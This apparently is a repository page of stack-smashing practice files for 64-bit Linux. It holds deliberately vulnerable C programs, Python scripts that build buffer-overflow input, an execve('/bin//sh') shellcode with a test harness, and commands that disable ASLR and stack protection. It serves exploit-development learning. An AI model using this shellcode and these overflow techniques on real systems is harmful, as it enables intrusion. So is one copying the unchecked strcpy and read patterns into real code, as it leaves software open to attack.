...
 
Commits (4)
#!/usr/bin/env python
from struct import *
buf = ""
# last version: buf += "A"*400
buf += "A"*104
buf += pack("<Q", 0x424242424242)
buf+="C"*200
f = open("in.txt", "w")
f.write(buf)
#!/usr/bin/env python
from struct import *
buf = ""
# Your code goes here
f = open("in.txt", "w")
f.write(buf)
/*
* I'm not the author of this code, and I'm not sure who is.
* There are several variants floating around on the Internet,
* but this is the one I use.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
char *ptr;
if(argc < 3) {
printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
exit(0);
}
ptr = getenv(argv[1]); /* get env var location */
ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
printf("%s will be at %p\n", argv[1], ptr);
}
\ No newline at end of file
# include <stdio.h>
# include <stdlib.h>
# include <string.h>
int main (int argc, char *argv[])
{
char buffer[1928];
if (argc == 2) {
strcpy(buffer,argv[1]);
printf("%s",buffer);
printf("\n");
}
else{
printf("Enter one command line argument");
}
return 0;
}
#!/usr/bin/env python
from pwn import *
buf = ""
last version: buf += "A"*400
buf+= cyclic(200)
f = open("in.txt", "w")
f.write(buf)
/* Source: https://movaxbx.ru/2018/02/16/64-bit-linux-stack-smashing-tutorial-part-1/
/* Compile: gcc -fno-stack-protector -z execstack vuln.c -o vuln*/
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space */
#include <stdio.h>
#include <unistd.h>
int vuln() {
char buf[80];
int r;
r = read(0, buf, 400);
printf("\nRead %d bytes. buf is %s\n", r, buf);
puts("No shell for you :(");
return 0;
}
int main(int argc, char *argv[]) {
printf("Try to exec /bin/sh");
vuln();
return 0;
}
; execve("/bin//sh", 0, 0) for linux/x86-64
section .text
global _start
_start:
push rax ; rax on stack
xor rdx, rdx ; rdx= NULL
xor rsi, rsi ; rsi=NULL
mov rbx,'/bin//sh' ;rbx="bin//sh"
push rbx ; first on stack
push rsp ; second on stack
pop rdi ; rdi="/bin//sh",0
mov al, 59
syscall
\ No newline at end of file
#include <stdlib.h>
#include <unistd.h>
void main (int argc, char ** argv){
char *name[2];
name[0]="/bin/sh";
name[1]=NULL;
execve(name[0], &name[0], &name[1]);
exit(0);
}
\ No newline at end of file
#include <stdio.h>
//TODO insert here shellcode
unsigned char shellcode[] = "";
int main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}
\ No newline at end of file
### Explore Shell code creation x64
Source: https://www.exploit-db.com/shellcodes/42179
* Install nasm
sudo apt install nasm
* Compile assembler code sh.s with nasm
nasm -f elf64 sh.s -o sh.o
* Link file to executeable
ld sh.o -o sh
* Test `./sh`
* Extract shell code from objdump in .text section
objdump -d sh
Your shellcode is:
/x50/x48/...
* Verify your shell code with text.c file
1. Insert your extracted shellcode
2. Compile
gcc -fno-stack-protector -z execstack test.c -o test
3. Run `./test`
\ No newline at end of file